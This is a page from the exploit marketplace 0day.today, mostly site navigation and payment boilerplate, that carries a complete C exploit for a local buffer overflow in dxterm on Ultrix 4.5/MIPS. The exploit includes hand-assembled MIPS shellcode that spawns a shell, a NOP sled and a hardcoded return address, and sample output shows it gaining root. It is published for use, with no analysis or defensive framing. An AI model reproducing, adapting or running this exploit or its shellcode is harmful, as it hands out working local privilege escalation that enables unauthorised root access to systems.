0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit
==================================================== Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit ==================================================== /* Ultrix 4.5/MIPS dxterm exploit by ztion in 2004 Greets to: Stok, sidez It wasn't possible to use '/' in the shellcode. Probably dxterm only copies everything after the last slash, as it expects a path. Since everything is pretty much hardcoded, you will probably have to tweak it for versions other than 4.5 nora> ./ultrix_dxterm_4.5_exploit $ id uid=268(ztion) gid=15(users)euid=0(root) */ #include <stdio.h> #define NOP 0x25f8e003 #define RET 0x7fffbe90 char shellcode[] = { 0x69,0x6e,0x19,0x3c, /* lui $t9, 0x6e69 */ 0x2e,0x61,0x39,0x37, /* ori $t9, $t9, 0x612e */ 0x38,0x01,0xb6,0x23, /* addi $s6, $sp, 312 */ 0x01,0x01,0x39,0x23, /* addi $t9, $t9, 0x0101 */ 0xf0,0xfe,0xd9,0xae, /* sw $t9, -272($s6) */ 0x73,0x68,0x19,0x3c, /* lui $t9, 0x6873 */ 0x11,0x11,0x06,0x24, /* li $a2, 0x1111 */ 0x11,0x11,0xc6,0x38, /* xori $a2, $a2, 0x1111 */ 0x2e,0x2e,0x39,0x37, /* ori $t9, $t9, 0x2e2e */ 0xf0,0xfe,0xc4,0x26, /* addiu $a0, $s6, -272 */ 0x01,0x01,0x39,0x23, /* addi $t9, $t9, 0x0101 */ 0x3f,0x01,0x02,0x24, /* li $v0, 319 */ 0xfc,0xfe,0x42,0x20, /* addi $v0, $v0, -260 */ 0xf4,0xfe,0xd9,0xae, /* sw $t9, -268($s6) */ 0xe8,0xfe,0xc4,0xae, /* sw $a0, -280($s6) */ 0xf8,0xfe,0xc6,0xae, /* sw $a2, -264($s6) */ 0xec,0xfe,0xc6,0xae, /* sw $a2, -276($s6) */ 0xe8,0xfe,0xc5,0x26, /* addiu $a1, $s6, -280 */ 0xcc,0xff,0xff,0x01 /* syscall */ }; int main(void) { char buf[256]; int i; memset (buf, 2, 255); i = 0; while (i <= 8) { ((int *)(buf+1))[i] = NOP; i++; } memcpy (buf+33, shellcode, sizeof(shellcode)); ((int *)(buf+3))[29] = RET; /* 119 - 122 is the return address */ buf[123] = '\0'; execl ("/usr/bin/dxterm", "dxterm", "-display", "localhost:0", "-setup", buf, NULL); } # 0day.today [2024-07-02] #